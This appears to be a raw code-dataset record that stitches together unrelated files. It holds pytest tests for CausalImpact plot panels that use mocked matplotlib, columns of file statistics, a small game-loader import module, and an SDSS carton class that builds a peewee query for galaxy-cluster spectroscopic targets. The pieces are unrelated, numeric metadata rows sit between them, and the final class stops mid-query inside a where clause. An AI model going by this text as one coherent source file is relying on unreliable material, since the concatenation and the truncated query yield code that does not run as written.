def test_plot_cumulative_panel_gap_data(rand_data, pre_int_gap_period,
                                        post_int_gap_period, monkeypatch):
    """'cumulative' panel with a gap between pre and post periods."""
    ci = CausalImpact(rand_data, pre_int_gap_period, post_int_gap_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['cumulative'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    # Cumulative panel shares its x axis with the first subplot.
    plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
    ax_args = ax_mock.plot.call_args
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['post_cum_effects'], ax_args[0][0])
    assert ax_args[0][1] == 'b--'
    assert ax_args[1] == {'label': 'Cumulative Effect'}
    # With a gap, the marker sits at the pre period's last point.
    ax_mock.axvline.assert_called_with(ci.pre_period[1], c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['post_cum_effects'].index)
    assert_array_equal(ax_args[0][1], inferences['post_cum_effects_lower'])
    assert_array_equal(ax_args[0][2], inferences['post_cum_effects_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_cumulative_panel_date_index(date_rand_data, pre_str_period, post_str_period,
                                          monkeypatch):
    """'cumulative' panel with a date index."""
    ci = CausalImpact(date_rand_data, pre_str_period, post_str_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['cumulative'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    # Cumulative panel shares its x axis with the first subplot.
    plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
    ax_args = ax_mock.plot.call_args
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['post_cum_effects'], ax_args[0][0])
    assert ax_args[0][1] == 'b--'
    assert ax_args[1] == {'label': 'Cumulative Effect'}
    # Expected axvline position: the last date of the pre period.
    date_ = datetime.strptime(ci.pre_period[1], "%Y%m%d")
    date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
    ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['post_cum_effects'].index)
    assert_array_equal(ax_args[0][1], inferences['post_cum_effects_lower'])
    assert_array_equal(ax_args[0][2], inferences['post_cum_effects_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_cumulative_panel_gap_date_index(date_rand_data, pre_str_gap_period,
                                              post_str_gap_period, monkeypatch):
    """'cumulative' panel with a date index and a pre/post period gap."""
    ci = CausalImpact(date_rand_data, pre_str_gap_period, post_str_gap_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['cumulative'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    # Cumulative panel shares its x axis with the first subplot.
    plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
    ax_args = ax_mock.plot.call_args
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['post_cum_effects'], ax_args[0][0])
    assert ax_args[0][1] == 'b--'
    assert ax_args[1] == {'label': 'Cumulative Effect'}
    # With a gap, the marker sits at the pre period's last date (no -1 day).
    date_ = datetime.strptime(ci.pre_period[1], "%Y%m%d")
    date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
    ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['post_cum_effects'].index)
    assert_array_equal(ax_args[0][1], inferences['post_cum_effects_lower'])
    assert_array_equal(ax_args[0][2], inferences['post_cum_effects_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_cumulative_panel_date_index_no_freq(date_rand_data, pre_str_period,
                                                  post_str_period, monkeypatch):
    """Cumulative panel when the date index has no inferable frequency.

    Rows are removed from the input frame so pandas cannot infer a frequency
    for the DatetimeIndex, exercising the timedelta fallback for the
    intervention vline.
    """
    dd = date_rand_data.copy()
    # BUGFIX: `DataFrame.drop` is not in-place — the original discarded its
    # result and fit on the untouched `date_rand_data`, so the no-frequency
    # scenario was never actually tested.  Assign the result and fit on it.
    dd = dd.drop(dd.index[10:20])
    ci = CausalImpact(dd, pre_str_period, post_str_period)
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['cumulative'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
    ax_args = ax_mock.plot.call_args
    llb = ci.trained_model.filter_results.loglikelihood_burn
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['post_cum_effects'], ax_args[0][0])
    assert ax_args[0][1] == 'b--'
    assert ax_args[1] == {'label': 'Cumulative Effect'}
    # With no index frequency the vline falls one day before the post-period
    # start instead of on the pre-period end.
    date_ = datetime.strptime(ci.post_period[0], "%Y%m%d")
    date_ = date_ + timedelta(days=-1)
    date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
    ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['post_cum_effects'].index)
    assert_array_equal(ax_args[0][1], inferences['post_cum_effects_lower'])
    assert_array_equal(ax_args[0][2], inferences['post_cum_effects_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_multi_panels(rand_data, pre_int_period, post_int_period, monkeypatch):
    """Plotting several panel combinations shares the x-axis and hides inner tick labels."""
    ci = CausalImpact(rand_data, pre_int_period, post_int_period)
    ax_mock = mock.Mock()
    ax_mock.get_xticklabels.return_value = 'xticklabels'
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)

    # original + pointwise: original panel draws 2 lines, pointwise 1.
    ci.plot(panels=['original', 'pointwise'], figsize=(10, 10))
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(10, 10))
    plotter_mock.subplot.assert_any_call(2, 1, 1)
    plotter_mock.subplot.assert_any_call(2, 1, 2, sharex=ax_mock)
    plotter_mock.setp.assert_called_once_with('xticklabels', visible=False)
    assert ax_mock.plot.call_count == 3
    plotter_mock.show.assert_called_once()
    # BUGFIX: the original called plot_mock.reset_mock() twice in a row
    # (copy-paste); one call suffices and it cascades to plotter_mock,
    # fig_mock and ax_mock, which are its return-value children.
    ax_mock.reset_mock()
    plot_mock.reset_mock()

    # original + cumulative
    ci.plot(panels=['original', 'cumulative'], figsize=(10, 10))
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(10, 10))
    plotter_mock.subplot.assert_any_call(2, 1, 1)
    plotter_mock.subplot.assert_any_call(2, 1, 2, sharex=ax_mock)
    plotter_mock.setp.assert_called_once_with('xticklabels', visible=False)
    assert ax_mock.plot.call_count == 3
    plotter_mock.show.assert_called_once()
    ax_mock.reset_mock()
    plot_mock.reset_mock()

    # pointwise + cumulative: both panels share the x-axis of the first.
    ci.plot(panels=['pointwise', 'cumulative'], figsize=(10, 10))
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(10, 10))
    plotter_mock.subplot.assert_any_call(2, 1, 1, sharex=ax_mock)
    plotter_mock.subplot.assert_any_call(2, 1, 2, sharex=ax_mock)
    plotter_mock.setp.assert_called_once_with('xticklabels', visible=False)
    assert ax_mock.plot.call_count == 2
    plotter_mock.show.assert_called_once()
    ax_mock.reset_mock()
    plot_mock.reset_mock()

    # all three panels
    ci.plot(panels=['pointwise', 'cumulative', 'original'], figsize=(10, 10))
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(10, 10))
    plotter_mock.subplot.assert_any_call(3, 1, 1)
    plotter_mock.subplot.assert_any_call(3, 1, 2, sharex=ax_mock)
    plotter_mock.subplot.assert_any_call(3, 1, 3, sharex=ax_mock)
    plotter_mock.setp.assert_called_with('xticklabels', visible=False)
    assert ax_mock.plot.call_count == 4
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_raises_when_not_initialized(rand_data, pre_int_period, post_int_period,
                                          monkeypatch):
    """Plotting before the model has produced summary data must raise RuntimeError."""
    ci = CausalImpact(rand_data, pre_int_period, post_int_period)
    ci.summary_data = None
    monkeypatch.setattr(plot.Plot, '_get_plotter',
                        mock.Mock(return_value=mock.Mock()))
    with pytest.raises(RuntimeError):
        ci.plot()
def test_plot_raises_wrong_input_panel(rand_data, pre_int_period, post_int_period,
                                       monkeypatch):
    """An unknown panel name must raise ValueError with the panel listed in the message."""
    ci = CausalImpact(rand_data, pre_int_period, post_int_period)
    monkeypatch.setattr(plot.Plot, '_get_plotter',
                        mock.Mock(return_value=mock.Mock()))
    with pytest.raises(ValueError) as excinfo:
        ci.plot(panels=['test'])
    expected = ('"test" is not a valid panel. Valid panels are: '
                '"original", "pointwise", "cumulative".')
    assert str(excinfo.value) == expected
def test_plot_with_no_llb(rand_data, pre_int_period, post_int_period, monkeypatch):
    """No burn-in note is written on the figure when loglikelihood_burn is zero."""
    axes = mock.Mock()
    pyplot = mock.Mock()
    pyplot.subplot.return_value = axes
    figure = mock.Mock()
    pyplot.figure.return_value = figure
    monkeypatch.setattr(plot.Plot, '_get_plotter', mock.Mock(return_value=pyplot))
    ci = CausalImpact(rand_data, pre_int_period, post_int_period)
    ci.trained_model.filter_results.loglikelihood_burn = 0
    ci.plot()
    figure.text.assert_not_called()
| 39.482565
| 90
| 0.696068
| 5,078
| 35,100
| 4.474793
| 0.042733
| 0.039607
| 0.024645
| 0.041808
| 0.951415
| 0.950227
| 0.950227
| 0.948334
| 0.944946
| 0.940589
| 0
| 0.021278
| 0.169858
| 35,100
| 888
| 91
| 39.527027
| 0.758563
| 0.018632
| 0
| 0.903597
| 0
| 0
| 0.11622
| 0.006391
| 0
| 0
| 0
| 0
| 0.407194
| 1
| 0.027338
| false
| 0
| 0.01295
| 0
| 0.040288
| 0.001439
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d2c9b5f152c75499a6c9989284b92842797c5070
| 192
|
py
|
Python
|
src/game/loaders/__init__.py
|
ShoaibSyed1/project-pokemon
|
6916962cf0be478c2a229b6620e9425d707c2b29
|
[
"MIT"
] | null | null | null |
src/game/loaders/__init__.py
|
ShoaibSyed1/project-pokemon
|
6916962cf0be478c2a229b6620e9425d707c2b29
|
[
"MIT"
] | null | null | null |
src/game/loaders/__init__.py
|
ShoaibSyed1/project-pokemon
|
6916962cf0be478c2a229b6620e9425d707c2b29
|
[
"MIT"
] | null | null | null |
from game.loaders.entity import EntityLoader
from game.loaders.scene import SceneLoader
from game.loaders.sprite import *
from game.loaders.text import TextLoader
from game.loaders.ui import *
| 38.4
| 44
| 0.838542
| 28
| 192
| 5.75
| 0.428571
| 0.248447
| 0.465839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098958
| 192
| 5
| 45
| 38.4
| 0.930636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d2dcfc198dba335c0fc699f56ee294c26e09e4ff
| 47,952
|
py
|
Python
|
python/target_selection/cartons/bhm_spiders_clusters.py
|
sdss/target_selection
|
7196bf1491c4e9c18140301c7001e503f391a8e1
|
[
"BSD-3-Clause"
] | 3
|
2020-07-07T01:38:59.000Z
|
2020-11-24T21:46:58.000Z
|
python/target_selection/cartons/bhm_spiders_clusters.py
|
sdss/target_selection
|
7196bf1491c4e9c18140301c7001e503f391a8e1
|
[
"BSD-3-Clause"
] | 26
|
2020-05-28T07:18:54.000Z
|
2021-11-30T18:36:10.000Z
|
python/target_selection/cartons/bhm_spiders_clusters.py
|
sdss/target_selection
|
7196bf1491c4e9c18140301c7001e503f391a8e1
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @Author: Tom Dwelly
# @Date: 2020-06-17
# @Filename: bhm_spiders_clusters.py
# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)
# isort: skip_file
import peewee
from peewee import JOIN
from peewee import fn
from target_selection.cartons.base import BaseCarton
from target_selection.mag_flux import AB2nMgy, AB2Jy
# general catalogdb imports
from sdssdb.peewee.sdss5db.catalogdb import (
Catalog,
EROSITASupersetClusters,
)
# imports of existing spectro catalogues
from sdssdb.peewee.sdss5db.catalogdb import (
CatalogToSDSS_DR16_SpecObj,
SDSS_DR16_SpecObj,
CatalogToBHM_eFEDS_Veto,
BHM_eFEDS_Veto,
SDSSV_BOSS_SPALL,
SDSSV_BOSS_Conflist,
SDSSV_Plateholes,
SDSSV_Plateholes_Meta,
)
# additional imports required by bhm_spiders_clusters_lsdr8
from sdssdb.peewee.sdss5db.catalogdb import (
CatalogToLegacy_Survey_DR8,
Legacy_Survey_DR8,
)
# additional imports required by bhm_spiders_clusters_ps1dr2
from sdssdb.peewee.sdss5db.catalogdb import (
Panstarrs1,
CatalogToPanstarrs1, # only exists after v0.5 cross-match
)
# Details: Start here
# https://wiki.sdss.org/display/OPS/Defining+target+selection+and+cadence+algorithms
# ############################################
# ############################################
# ############################################
# ############################################
# # This file provides the following BHM cartons in v0.5:
#
# bhm_spiders_clusters_efeds_stragglers
# bhm_spiders_clusters_lsdr8
# bhm_spiders_clusters_ps1dr2
#
# ############################################
# ############################################
# ############################################
# ############################################
# Notes on how many targets to expect:
# => SELECT ero_version,xmatch_method,xmatch_version,opt_cat,count(*)
# FROM erosita_superset_clusters GROUP BY ero_version,xmatch_method,xmatch_version,opt_cat;
# ero_version | xmatch_method | xmatch_version | opt_cat | count
# --------------------------+--------------------+--------------------------+--------------+--------
# eFEDS_c001_V18C_legacy_d | EROMAPPER_LS_DR8 | grzw1_v0.3_2020-12-04 | lsdr8 | 73768
# em01_c946_201008_poscorr | EROMAPPER_LS_DR8 | grzw1_v0.3_2020-12-04 | lsdr8 | 160465
# em01_c946_201008_poscorr | EROMAPPER_PS1_DR2 | eromapper_2020-10-23 | ps1dr2 | 140808
#
#
# END PREAMBLE
# ##################################################################################
class BhmSpidersClustersLsdr8Carton(BaseCarton):
    """SPIDERS clusters selected from the Legacy Survey DR8 cross-match.

    Targets are ranked members of eROSITA superset clusters with LS DR8
    counterparts.  Candidates that already have a good archival spectrum
    (SDSS DR16, eFEDS March2020, SDSS-V spAll) or sit in an unobserved,
    already-drilled plate hole are vetoed.
    """

    name = 'bhm_spiders_clusters_lsdr8'
    category = 'science'
    mapper = 'BHM'
    program = 'bhm_spiders'
    tile = False
    instrument = 'BOSS'
    inertial = True

    def build_query(self, version_id, query_region=None):
        """Return the peewee query selecting this carton's targets.

        Parameters
        ----------
        version_id
            Cross-match plan version id; filters all catalog relational tables.
        query_region
            Optional (ra, dec, radius) sequence restricting targets to a cone.
        """
        c = Catalog.alias()
        ls = Legacy_Survey_DR8.alias()
        c2ls = CatalogToLegacy_Survey_DR8.alias()
        xx = EROSITASupersetClusters.alias()
        # NOTE: the original had dead `s2020 = ...`/`sV = ...` alias
        # assignments here; they were shadowed below and have been removed.

        # Rank the counterparts of each eROSITA detection by decreasing
        # xmatch_metric; rank 1 is treated as the brightest cluster galaxy.
        x = (
            xx
            .select(
                fn.rank().over(partition_by=[xx.ero_detuid],
                               order_by=[xx.xmatch_metric.desc()]).alias('x_rank'),
                xx.ero_detuid.alias('ero_detuid'),
                xx.ls_id.alias('ls_id'),
                xx.target_has_spec.alias('target_has_spec'),
            )
            .where(
                (xx.ero_version == self.parameters['ero_version']),
                (xx.xmatch_method == self.parameters['xmatch_method']),
                (xx.xmatch_version == self.parameters['xmatch_version']),
                (xx.opt_cat == self.parameters['opt_cat']),
                (xx.xmatch_metric > self.parameters['xmatch_metric_min']),
                (xx.ero_det_like > self.parameters['det_like_min']),
            )
            .alias('x')
        )

        instrument = peewee.Value(self.instrument)
        inertial = peewee.Value(self.inertial).cast('bool')

        # Convert parameter-file magnitude limits into fluxes (brighter
        # magnitude -> larger flux, hence the min/max swap).
        fibertotflux_r_max = AB2nMgy(self.parameters['fibertotmag_r_min'])
        fibertotflux_r_min = AB2nMgy(self.parameters['fibertotmag_r_max'])
        fibertotflux_z_max = AB2nMgy(self.parameters['fibertotmag_z_min'])
        fibertotflux_z_min = AB2nMgy(self.parameters['fibertotmag_z_max'])

        fibertotflux_r_min_for_cadence1 = AB2nMgy(self.parameters['fibertotmag_r_for_cadence1'])
        fibertotflux_z_min_for_cadence1 = AB2nMgy(self.parameters['fibertotmag_z_for_cadence1'])
        fibertotflux_r_min_for_cadence2 = AB2nMgy(self.parameters['fibertotmag_r_for_cadence2'])
        gaia_g_max_for_cadence1 = self.parameters['gaia_g_max_for_cadence1']
        gaia_rp_max_for_cadence1 = self.parameters['gaia_rp_max_for_cadence1']

        # #########################################################################
        # prepare the spectroscopy catalogues
        match_radius_spectro = self.parameters['spec_join_radius'] / 3600.0
        spec_sn_thresh = self.parameters['spec_sn_thresh']
        spec_z_err_thresh = self.parameters['spec_z_err_thresh']

        # SDSS DR16 - archival good-quality redshifts
        c2s16 = CatalogToSDSS_DR16_SpecObj.alias()
        ss16 = SDSS_DR16_SpecObj.alias()
        s16 = (
            ss16.select(
                ss16.specobjid.alias('specobjid'),
            )
            .where(
                ss16.snmedian >= spec_sn_thresh,
                ss16.zwarning == 0,
                ss16.zerr <= spec_z_err_thresh,
                ss16.zerr > 0.0,
                ss16.scienceprimary > 0,
            )
            .alias('s16')
        )

        # SDSS-IV/eFEDS March2020
        c2s2020 = CatalogToBHM_eFEDS_Veto.alias()
        ss2020 = BHM_eFEDS_Veto.alias()
        s2020 = (
            ss2020.select(
                ss2020.pk.alias('pk'),
            )
            .where(
                ss2020.sn_median_all >= spec_sn_thresh,
                ss2020.zwarning == 0,
                ss2020.z_err <= spec_z_err_thresh,
                ss2020.z_err > 0.0,
            )
            .alias('s2020')
        )

        # SDSS-V spAll
        ssV = SDSSV_BOSS_SPALL.alias()
        sV = (
            ssV.select(
                ssV.specobjid.alias('specobjid'),
                ssV.plug_ra.alias('plug_ra'),
                ssV.plug_dec.alias('plug_dec'),
            )
            .where(
                ssV.sn_median_all >= spec_sn_thresh,
                ssV.zwarning == 0,
                ssV.z_err <= spec_z_err_thresh,
                ssV.z_err > 0.0,
                ssV.specprimary > 0,
            )
            .alias('sV')
        )

        # SDSS-V plateholes - only consider plateholes that
        # were drilled+shipped but that were not yet observed
        ssph = SDSSV_Plateholes.alias()
        ssphm = SDSSV_Plateholes_Meta.alias()
        ssconf = SDSSV_BOSS_Conflist.alias()
        sph = (
            ssph.select(
                ssph.pkey.alias('pkey'),
                ssph.target_ra.alias('target_ra'),
                ssph.target_dec.alias('target_dec'),
            )
            .join(
                ssphm,
                on=(ssph.yanny_uid == ssphm.yanny_uid)
            )
            .join(
                ssconf, JOIN.LEFT_OUTER,
                on=(ssphm.plateid == ssconf.plate)
            )
            .where(
                (ssph.holetype == 'BOSS_SHARED'),
                (ssph.sourcetype == 'SCI') | (ssph.sourcetype == 'STA'),
                ssphm.isvalid > 0,
                ssconf.plate.is_null(),
            )
            .alias('sph')
        )

        # priority is determined by target rank within cluster:
        # the BCG (rank 1) gets the carton's floor priority; members are
        # demoted per rank, capped at priority_levels - 2 extra steps.
        priority = peewee.Case(
            None,
            (
                (
                    x.c.x_rank == 1,
                    self.parameters['priority_floor_bcg']
                ),
                (
                    x.c.x_rank > 1,
                    self.parameters['priority_floor_member'] +
                    fn.least(self.parameters['priority_levels'] - 2,
                             x.c.x_rank - 2)
                ),
            ),
            None)

        value = peewee.Case(
            None,
            (
                (x.c.x_rank == 1, self.parameters['value_bcg']),
                (x.c.x_rank > 1, self.parameters['value_member']),
            ),
            None).cast('float')

        # choose cadence based on fiber magnitude in r-band (with Gaia
        # magnitudes as an additional bright-end trigger for cadence1)
        cadence1 = self.parameters['cadence1']
        cadence2 = self.parameters['cadence2']
        cadence3 = self.parameters['cadence3']
        cadence4 = 'unknown_cadence'  # catch failures
        cadence = peewee.Case(
            None,
            (
                (
                    ((ls.fibertotflux_r > fibertotflux_r_min_for_cadence1) |
                     (ls.fibertotflux_z > fibertotflux_z_min_for_cadence1) |
                     (ls.gaia_phot_g_mean_mag.between(0.1, gaia_g_max_for_cadence1)) |
                     (ls.gaia_phot_rp_mean_mag.between(0.1, gaia_rp_max_for_cadence1))),
                    cadence1),
                (ls.fibertotflux_r > fibertotflux_r_min_for_cadence2, cadence2),
                (ls.fibertotflux_r <= fibertotflux_r_min_for_cadence2, cadence3),
            ),
            cadence4)

        # compute transformed SDSS mags for pointlike and extended sources uniformly
        # transform the legacysurvey grz into sdss psfmag griz
        # extract coeffs from fit logs via:
        # awk 'BEGIN {print("coeffs = {")} /POLYFIT/{ if($3~/sdss_psfmag/){pe="p"} else if ($3~/sdss_fiber2mag/){pe="e"} else{pe="error"}; printf("\"%s%d_%s\": %s,\n", substr($3,length($3)), $8, pe, $10)} END {print("}")}' bhm_spiders_clusters_lsdr8/lsdr8_fibermag_to_sdss_fiber2mag_?_results.log # noqa
        coeffs = {
            "g2_e": -0.897719,
            "g1_e": 2.298300,
            "g0_e": -1.019299,
            "i2_e": -0.950114,
            "i1_e": 0.981972,
            "i0_e": -0.261645,
            "r2_e": -0.201741,
            "r1_e": 0.697128,
            "r0_e": -0.120926,
            "z2_e": -1.424312,
            "z1_e": 2.415301,
            "z0_e": -0.677163,
        }

        nMgy_min = 1e-3  # equiv to AB=30
        # extended - start from ls8 fiberfluxes
        g0_e = (22.5 - 2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_g)))
        r0_e = (22.5 - 2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_r)))
        z0_e = (22.5 - 2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_z)))
        g_r_e = (-2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_g) /
                                      peewee.fn.greatest(nMgy_min, ls.fiberflux_r)))
        r_z_e = (-2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_r) /
                                      peewee.fn.greatest(nMgy_min, ls.fiberflux_z)))

        # polynomial colour-term transformation to SDSS fiber2mag
        g_e = (g0_e + coeffs['g0_e'] + coeffs['g1_e'] * g_r_e + coeffs['g2_e'] * g_r_e * g_r_e)
        r_e = (r0_e + coeffs['r0_e'] + coeffs['r1_e'] * g_r_e + coeffs['r2_e'] * g_r_e * g_r_e)
        i_e = (r0_e + coeffs['i0_e'] + coeffs['i1_e'] * r_z_e + coeffs['i2_e'] * r_z_e * r_z_e)
        z_e = (z0_e + coeffs['z0_e'] + coeffs['z1_e'] * r_z_e + coeffs['z2_e'] * r_z_e * r_z_e)

        # validity checks - transformed mags are only reported when all three
        # input fibermags are in a sane range
        valid = (g0_e.between(0.1, 29.9) &
                 r0_e.between(0.1, 29.9) &
                 z0_e.between(0.1, 29.9))

        opt_prov = peewee.Case(None, ((valid, 'sdss_fiber2mag_from_lsdr8'),), 'undefined')
        magnitude_g = peewee.Case(None, ((valid, g_e),), 'NaN')
        magnitude_r = peewee.Case(None, ((valid, r_e),), 'NaN')
        magnitude_i = peewee.Case(None, ((valid, i_e),), 'NaN')
        magnitude_z = peewee.Case(None, ((valid, z_e),), 'NaN')
        magnitude_gaia_g = peewee.Case(
            None,
            ((ls.gaia_phot_g_mean_mag.between(0.1, 29.9), ls.gaia_phot_g_mean_mag),),
            'NaN')
        magnitude_gaia_bp = peewee.Case(
            None,
            ((ls.gaia_phot_bp_mean_mag.between(0.1, 29.9), ls.gaia_phot_bp_mean_mag),),
            'NaN')
        magnitude_gaia_rp = peewee.Case(
            None,
            ((ls.gaia_phot_rp_mean_mag.between(0.1, 29.9), ls.gaia_phot_rp_mean_mag),),
            'NaN')

        query = (
            c.select(
                c.catalogid.alias('catalogid'),
                ls.ls_id.alias('ls_id'),  # extra
                x.c.ero_detuid.cast('text').alias('ero_detuid'),  # extra
                c.ra.alias('ra'),  # extra
                c.dec.alias('dec'),  # extra
                priority.alias('priority'),
                value.alias('value'),
                cadence.alias('cadence'),
                instrument.alias('instrument'),
                opt_prov.alias('optical_prov'),
                magnitude_g.alias('g'),
                magnitude_r.alias('r'),
                magnitude_i.alias('i'),
                magnitude_z.alias('z'),
                magnitude_gaia_g.alias('gaia_g'),
                magnitude_gaia_bp.alias('bp'),
                magnitude_gaia_rp.alias('rp'),
                inertial.alias('inertial'),
                g0_e.alias('ls8_fibermag_g'),  # extra
                r0_e.alias('ls8_fibermag_r'),  # extra
                z0_e.alias('ls8_fibermag_z'),  # extra
            )
            .join(c2ls)
            .join(ls)
            .join(x, on=(ls.ls_id == x.c.ls_id))
            # start joining the spectroscopy
            .switch(c)
            .join(c2s16, JOIN.LEFT_OUTER)
            .join(
                s16, JOIN.LEFT_OUTER,
                on=(
                    (c2s16.target_id == s16.c.specobjid) &
                    (c2s16.version_id == version_id)
                )
            )
            .switch(c)
            .join(c2s2020, JOIN.LEFT_OUTER)
            .join(
                s2020, JOIN.LEFT_OUTER,
                on=(
                    (c2s2020.target_id == s2020.c.pk) &
                    (c2s2020.version_id == version_id)
                )
            )
            .join(
                sV, JOIN.LEFT_OUTER,
                on=(
                    fn.q3c_join(sV.c.plug_ra, sV.c.plug_dec,
                                c.ra, c.dec,
                                match_radius_spectro)
                )
            )
            .join(
                sph, JOIN.LEFT_OUTER,
                on=(
                    fn.q3c_join(sph.c.target_ra, sph.c.target_dec,
                                c.ra, c.dec,
                                match_radius_spectro)
                )
            )
            # finished joining the spectroscopy
            .where(
                c.version_id == version_id,
